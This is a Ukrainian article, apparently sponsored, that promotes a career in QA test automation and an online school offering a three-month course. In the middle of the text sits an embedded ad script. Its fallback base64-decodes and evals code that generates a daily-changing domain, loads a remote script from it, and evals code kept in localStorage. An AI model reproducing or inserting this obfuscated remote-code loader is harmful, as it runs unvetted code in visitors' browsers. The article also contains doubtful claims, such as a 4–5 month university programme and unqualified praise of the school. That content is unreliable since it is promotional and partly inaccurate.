Доволі велике різноманіття сьогодні на ринку праці. Щороку з’являється більш ніж п’ять нових професій, а вибір майбутньої професії стає ще більш складним. Для того, щоб обрати певну сферу, потрібно проаналізувати ріст попиту на неї та на її окремі напрямки, зіставити ріст заробітної плати за останні роки, відслідкувати попит на спеціалістів даного профілю на сайтах пошуку роботи.
Найбільш затребуваною на сьогодні стала IT-сфера. Окрім того, що вона стала другою за доходом від експорту за останні два роки, в найближчі десять років керівництво держави планує зробити її провідною галуззю України. Тому вже на 2023 рік заплановано виділення бюджету на розвиток саме IT-сфери.
Яку саме айтішну професію обрати?
Серед різноманіття IT-професій також потрібно визначитись з найбільш перспективною. На сьогодні розповсюдженими є: розробка (Java, JS, Python), тестування та дизайн. Для останньої потрібно обов’язково мати творчі здібності та смак, тому вважається, що ця професія не для всіх.
Для розробника зазвичай отримують знання у вищих навчальних закладах. Період навчання триває 4-5 місяців, за який студенти вивчають поглиблено необхідну базу, проходять стажування в різних IT-компаніях і відточують свої навички. Також є можливість навчатись на прискорених курсах, проте, слід розуміти, що в більшості випадків отримуються поверхневі знання, і якщо обирати поміж двох кандидатів, роботодавець надасть перевагу вищій освіті.
В тестуванні мало платять.
Якщо спиратись на заробітну плату, то в тестуванні, як і в дизайні, не такі великі зарплати як в розробці. Але, не так давно виник новий напрямок в тестуванні, як автоматизація. Ця професія виникла на стику розробки та тестування. Автоматизатор пише мовою програмування додаткові програмні забезпечення для тестування основної програми проєкту, тим самим спрощує роботу тестувальника на деяких ділянках продукту. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Автоматизація — більш вища ступінь в тестуванні. Заробітна плата автоматизатора прирівнюється до розробника, що складає на початковому етапі $1000. В середньому QA Automation engineer заробляють близько $3500 після двох років роботи.
Як стати автоматизатором?
Для автоматизації ще не розробили план навчання для вищої освіти, та не так багато онлайн шкіл сьогодні надають можливість навчатись даній професії. Провідна школа, IT Testing Scholl, була однією з перших, хто створив програму навчання з автоматизації. З нею можна ознайомитись за посиланням: www.it-testing-school.com/qa-automation. Можна бути впевненому в якості навчання у цій школі.
Навчання на автоматизатора триває три місяці, на якому вивчається мова програмування для створення простих програм тестування, база теоретичних знань та відпрацьовуються навики на практичних заняттях з проєктами іноземних замовників. Тобто, за три місяці студенти стають готовими спеціалістами з досвідом тестування від місяця.
Щоб приєнатися до курсу переходьте та реєструйтеся на https://it-testing-school.com/qa-automation. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/chomu-vazhlivo-zvernuti-uvagu-na-onlajn-profesiyu-avtomatizatora-pz/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook